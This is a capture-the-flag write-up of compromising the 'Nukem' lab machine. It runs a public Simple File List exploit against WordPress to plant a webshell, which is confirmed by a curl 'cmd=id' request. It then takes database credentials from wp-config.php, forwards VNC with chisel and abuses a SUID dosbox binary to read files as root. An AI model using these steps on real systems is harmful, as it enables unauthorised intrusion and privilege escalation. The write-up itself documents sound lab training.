Nukem

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 192.168.183.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 18:50 +08
Nmap scan report for 192.168.183.105
Host is up (0.17s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
5000/tcp  open  upnp
13000/tcp open  unknown
36445/tcp open  unknown

RDP is open. Ran a detailed scan as well:

$ sudo nmap -p 80,5000,13000 -sC -sV --min-rate 3000 192.168.183.105
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 18:53 +08
Nmap scan report for 192.168.183.105
Host is up (0.18s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
|_http-title: Retro Gamming – Just another WordPress site
|_http-generator: WordPress 5.5.1
5000/tcp  open  http    Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
13000/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Login V14

First thing I took note of was the outdated Wordpress site on port 80.

Wordpress -> RCE

I ran a wpscan on the port 80 application.

$ wpscan --api-token <API> --enumerate p,t,u --url http://192.168.183.105

There were loads of vulnerabilities, but the one that looked the easiest to exploit was the Simple File List RCE:

[i] Plugin(s) Identified:

[+] simple-file-list
 | Location: http://192.168.183.105/wp-content/plugins/simple-file-list/
 | Last Updated: 2023-06-08T11:52:00.000Z
 | [!] The version is out of date, the latest version is 6.1.8
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 6 vulnerabilities identified:
 |
 | [!] Title: Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
 |     Fixed in: 4.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574
 |      - https://simplefilelist.com/
 |      - https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list
 |      - https://packetstormsecurity.com/files/160221/

Unauthenticated = good in this case. searchsploit shows that there are 2 exploits publicly available:

$ searchsploit Wordpress Plugin simple file list
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
WordPress Plugin Simple File List 4.2.2 - Arbitrary File U | php/webapps/48979.py
WordPress Plugin Simple File List 4.2.2 - Remote Code Exec | php/webapps/48449.py
----------------------------------------------------------- ---------------------------------

I found that the first one worked better. Within the exploit, I also changed the payload to drop a webshell instead:

We can then run the exploit and confirm that it works:

$ python3 48979.py http://192.168.183.105
[ ] File 4345.png generated with password: 7a1538697392c42d7dbfb559c6fb67aa
[ ] File uploaded at http://192.168.183.105/wp-content/uploads/simple-file-list/4345.png
[ ] File moved to http://192.168.183.105/wp-content/uploads/simple-file-list/4345.php
[+] Exploit seem to work.
[*] Confirmning ...

$ curl http://192.168.183.105/wp-content/uploads/simple-file-list/4345.php?cmd=id
uid=33(http) gid=33(http) groups=33(http)

Tested loads of ports, and only reverse shells to port 80 work:

Privilege Escalation

Commander Creds

The /srv/html/wp-config.php file contained some creds for the user commander:

/** MySQL database username */
define( 'DB_USER', 'commander' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );

VNC + Dosbox SUID

I checked the SUID binaries available and found dosbox was one of them.

[commander@nukem ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/dosbox

dosbox SUID privilege escalation exploits require a GUI to work, and conveniently, VNC on port 5901 is available on the machine:

[commander@nukem ~]$ netstat -tulpn 
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      401/Xvnc            
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:36445           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:13000           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::3306                 :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::36445                :::*                    LISTEN      - 

Also, within the user's directory, there's a .vnc file which presumably contains credentials we need:

[commander@nukem ~]$ ls -la .vnc
total 20
drwxr-xr-x  2 commander root      4096 Sep 18  2020 .
drwxr-xr-x 11 commander commander 4096 Jul 12 11:03 ..
-rw-r--r--  1 commander root        54 Sep 18  2020 config
-rw-r--r--  1 commander commander 3479 Feb 17 19:27 nukem:1.log
-rw-------  1 commander commander    8 Sep 18  2020 passwd

We can transfer the small passwd file over to our machine via base64 encoding. Then, we can port forward VNC via chisel. Using vncviewer, we can connect to it:

$ vncviewer -passwd passwd 127.0.0.1:5901

Within the terminal we can run this:

dosbox -c 'mount c /' -c "type c:$LFILE"

This would spawn a dosbox instance (which is basically a cmd.exe instance). Using the C: command, we can view the root flag:

There's no scrolling on this Dosbox instance, and the handling of control characters is a little inaccurate (so you can't really backspace). Other than that, we have root access over the file system and can do whatever we want.

Rooted!